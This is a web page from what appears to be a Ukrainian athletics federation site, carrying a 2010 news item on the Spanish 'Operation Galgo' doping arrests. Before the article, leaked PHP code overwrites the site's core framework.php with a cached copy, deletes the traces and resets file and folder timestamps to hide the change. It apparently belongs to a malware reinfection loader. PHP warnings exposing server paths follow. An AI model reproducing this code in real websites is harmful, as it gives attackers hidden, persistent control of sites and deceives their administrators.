$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /home/tdsstudio/data/www/flauz.uz.ua/includes/framework.php:92) in /home/tdsstudio/data/www/flauz.uz.ua/libraries/joomla/session/session.php on line 426
Безабєх зізнався | ФЕДЕРАЦІЯ ЛЕГКОЇ АТЛЕТИКИ УЖГОРОДА

 

Безабєх зізнався

 

Безабєх зізнався
14.12.2010

Минулорічний чемпіон Європи з кросу Алемайеу Безабєх повідомив, що порушував антидопінгове законодавство.

Іспанець ефіопського походження дав свідчення поліції, яка в ході обшуку в будинку Безабєху знайшла пакет з кров'ю спортсмена, призначеної для переливання бігуну. Його тренер - Мануель Паскуа - був одним з 14 заарештованих в ході проведеної минулого тижня «операції Гальго». У неділю після допитів під підписку про невиїзд були відпущені: Паскуа, тренер Марти Домінгес - Сесар Перес, бігун Альберто Гарсіа та менеджера Хосе Алонсо. Ще 8 людей залишилися під арештом. У цій групі і чемпіонка світу в стіпльчезе березня Домінгес, чий допит в режимі відеоконференції пройде на цьому тижні (Домінгес вагітна, тому її відпустили додому).
Іспанська поліція повідомила, що розслідування у справі про порушення антидопінгового законодавства йшло з квітня 2010 року, а рішення про масштабні грудневих обшуках було прийнято ще в середині листопада.

Президент Іспанської королівської федерації легкої атлетики Хосе Марія Одріосола заявив у понеділок на прес-конференції в Мадриді, що не збирається йти у відставку через допінговий скандал. "Я відчуваю себе жертвою. Було б проявом боягузтва з мого боку залишати в такий складний момент корабель. Думаю, я чесно виконував свої обов'язки як президент федерації і не міг собі навіть уявити, що таке могло трапитися. Я борюся з застосуванням і поширенням допінгу відкрито і активно, і ви все це прекрасно знаєте. Щоразу, коли виникало хоча б мінімальне підозру в можливості використання заборонених препаратів, федерація проводила несподівані перевірки серед легкоатлетів, щоб виявити порушників. Щорічно ми робимо більше тисячі контрольних перевірок ", - заявив Одріосола.

Лікар з Іспанії Еуфеміано Фуентес, заарештований іспанською поліцією за підозрою в застосуванні заборонених препаратів, пригрозив розповісти правду про їх вживанні спортсменами, що проходили у нього лікування, в тому числі відомими футболістами, повідомляє ІНТЕРФАКС з посиланням на іспанську газету "Мундо". "Якщо б я розповів те, що знаю, то можна було б розпрощатися з чемпіонатом світу та Європи (з футболу - ІФ)", - заявив він. Також лікар заявив сусідам по камері, що його переслідують за те, що він занадто багато знає.

За інформацією видання, Фуентес, уродженець Канарських островів, був затриманий в рамках "операції Гальго", спрямованої на виявлення осіб, які займалися розповсюдженням заборонених у спорті препаратів. В Іспанії побоюються, що в тому випадку, якщо слова лікаря підтвердяться, останні успішні результати національної збірної з футболу під керівництвом тренерів Вісенте дель Боске і Луїса Арагонеса можуть бути переглянуті.

Фуентес лікував спортсменів, що представляють різні види спорту, наприклад, велогонщиків, легкоатлетів, а також тенісистів.

 
'Flauz' интернет магазин спортивного питания